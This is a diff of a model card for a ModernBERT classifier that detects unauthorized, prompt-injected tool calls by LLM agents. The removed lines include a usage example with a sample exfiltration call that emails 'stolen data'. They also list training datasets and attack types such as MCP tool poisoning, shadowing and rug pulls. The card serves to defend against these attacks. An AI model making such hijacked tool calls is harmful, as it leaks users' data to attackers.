llm-semantic-router
/

toolcall-verifier

@@ -20,7 +20,7 @@ datasets:
 base_model: answerdotai/ModernBERT-base
 pipeline_tag: token-classification
 model-index:
-- name: tool-call-verifier
   results:
   - task:
       type: token-classification
@@ -46,7 +46,6 @@ model-index:
 [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
 [![Model](https://img.shields.io/badge/🤗-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
-[![Security](https://img.shields.io/badge/Security-LLM%20Defense-red)](https://huggingface.co/rootfs)
 **Stage 2 of Two-Stage LLM Agent Defense Pipeline**
@@ -65,54 +64,6 @@ ToolCallVerifier is a **ModernBERT-based token classifier** that detects unautho
 ---
-## 📊 Performance
-| Metric | Value |
-|--------|-------|
-| **UNAUTHORIZED F1** | **93.50%** |
-| UNAUTHORIZED Precision | 95.01% |
-| UNAUTHORIZED Recall | 92.05% |
-| Overall Accuracy | 92.88% |
-### Confusion Matrix (Token-Level)
-```
-                    Predicted
-                 AUTH      UNAUTH
-Actual AUTH      130,708    8,483
-       UNAUTH     13,924   161,031
-```
----
-## 🗂️ Training Data
-Trained on **~30,000 samples** combining real-world attacks and synthetic patterns:
-### HuggingFace Datasets
-| Dataset | Description | Samples |
-|---------|-------------|---------|
-| [LLMail-Inject](https://huggingface.co/datasets/microsoft/llmail-inject-challenge) | Microsoft email injection benchmark | ~10,000 |
-| [WildJailbreak](https://huggingface.co/datasets/allenai/wildjailbreak) | Allen AI adversarial safety dataset | ~8,000 |
-| [HackAPrompt](https://huggingface.co/datasets/hackaprompt/hackaprompt-dataset) | EMNLP'23 injection competition | ~5,000 |
-| [JailbreakBench](https://huggingface.co/datasets/JailbreakBench/JBB-Behaviors) | Harmful behavior patterns | ~2,000 |
-### Synthetic Attack Generators
-| Generator | Description |
-|-----------|-------------|
-| Adversarial | Intent-mismatch attacks (correct tool, wrong args) |
-| Filesystem | File/directory operation attacks |
-| Network | Network/API exfiltration attacks |
-| Email | Email tool hijacking |
-| Financial | Transaction manipulation |
-| Code Execution | Code injection attacks |
-| Authentication | Access control bypass |
-| MCP Attacks | Tool poisoning, shadowing, rug pulls |
----
 ## 🚨 Attack Categories Covered
 | Category | Source | Description |
@@ -127,60 +78,6 @@ Trained on **~30,000 samples** combining real-world attacks and synthetic patter
 | MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
 | MCP Shadowing | Synthetic | Fake authorization context |
----
-## 💻 Usage
-```python
-from transformers import AutoTokenizer, AutoModelForTokenClassification
-import torch
-model_name = "rootfs/tool-call-verifier"
-tokenizer = AutoTokenizer.from_pretrained(model_name)
-model = AutoModelForTokenClassification.from_pretrained(model_name)
-# Example: Verify a tool call
-user_intent = "Summarize my emails"
-tool_call = '{"name": "send_email", "arguments": {"to": "[email protected]", "body": "stolen data"}}'
-# Combine for classification
-input_text = f"[USER] {user_intent} [TOOL] {tool_call}"
-inputs = tokenizer(input_text, return_tensors="pt", truncation=True, max_length=2048)
-with torch.no_grad():
-    outputs = model(**inputs)
-    predictions = torch.argmax(outputs.logits, dim=-1)
-id2label = {0: "AUTHORIZED", 1: "UNAUTHORIZED"}
-tokens = tokenizer.convert_ids_to_tokens(inputs["input_ids"][0])
-labels = [id2label[p.item()] for p in predictions[0]]
-# Check for unauthorized tokens
-unauthorized_tokens = [(t, l) for t, l in zip(tokens, labels) if l == "UNAUTHORIZED"]
-if unauthorized_tokens:
-    print("⚠️ BLOCKED: Unauthorized tool call detected!")
-    print(f"   Flagged tokens: {[t for t, _ in unauthorized_tokens[:5]]}")
-else:
-    print("✅ Tool call authorized")
-```
----
-## ⚙️ Training Configuration
-| Parameter | Value |
-|-----------|-------|
-| Base Model | `answerdotai/ModernBERT-base` |
-| Max Length | 512 tokens |
-| Batch Size | 32 |
-| Epochs | 5 |
-| Learning Rate | 3e-5 |
-| Loss | CrossEntropyLoss (class-weighted) |
-| Class Weights | `[0.5, 3.0]` (AUTHORIZED, UNAUTHORIZED) |
-| Attention | SDPA (Flash Attention) |
-| Hardware | AMD Instinct MI300X (ROCm) |
----
 ## 🔗 Integration with FunctionCallSentinel
@@ -188,7 +85,7 @@ This model is **Stage 2** of a two-stage defense pipeline:
 ```
 ┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
-│   User Prompt   │────▶│ FunctionCallSentinel │────▶│   LLM + Tools   │
 │                 │     │      (Stage 1)       │     │                 │
 └─────────────────┘     └──────────────────────┘     └────────┬────────┘
                                                               │
@@ -220,23 +117,8 @@ This model is **Stage 2** of a two-stage defense pipeline:
 - Non-tool-calling scenarios
 - Languages other than English
----
-## ⚠️ Limitations
-1. **Tool schema dependent** — Best performance when tool schema is included in input
-2. **English only** — Not tested on other languages
-3. **Binary classification** — No "suspicious" intermediate category (by design, for decisiveness)
----
 ## 📜 License
 Apache 2.0
----
-## 🔗 Links
-- **Stage 1 Model**: [rootfs/function-call-sentinel](https://huggingface.co/rootfs/function-call-sentinel)

 base_model: answerdotai/ModernBERT-base
 pipeline_tag: token-classification
 model-index:
+- name: toolcall-verifier
   results:
   - task:
       type: token-classification
 [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
 [![Model](https://img.shields.io/badge/🤗-ModernBERT--base-yellow)](https://huggingface.co/answerdotai/ModernBERT-base)
 **Stage 2 of Two-Stage LLM Agent Defense Pipeline**
 ---
 ## 🚨 Attack Categories Covered
 | Category | Source | Description |
 | MCP Tool Poisoning | Synthetic | Hidden exfiltration in tool args |
 | MCP Shadowing | Synthetic | Fake authorization context |
 ## 🔗 Integration with FunctionCallSentinel
 ```
 ┌─────────────────┐     ┌──────────────────────┐     ┌─────────────────┐
+│   User Prompt   │────▶│ ToolCallSentinel │────▶│   LLM + Tools   │
 │                 │     │      (Stage 1)       │     │                 │
 └─────────────────┘     └──────────────────────┘     └────────┬────────┘
                                                               │
 - Non-tool-calling scenarios
 - Languages other than English
 ## 📜 License
 Apache 2.0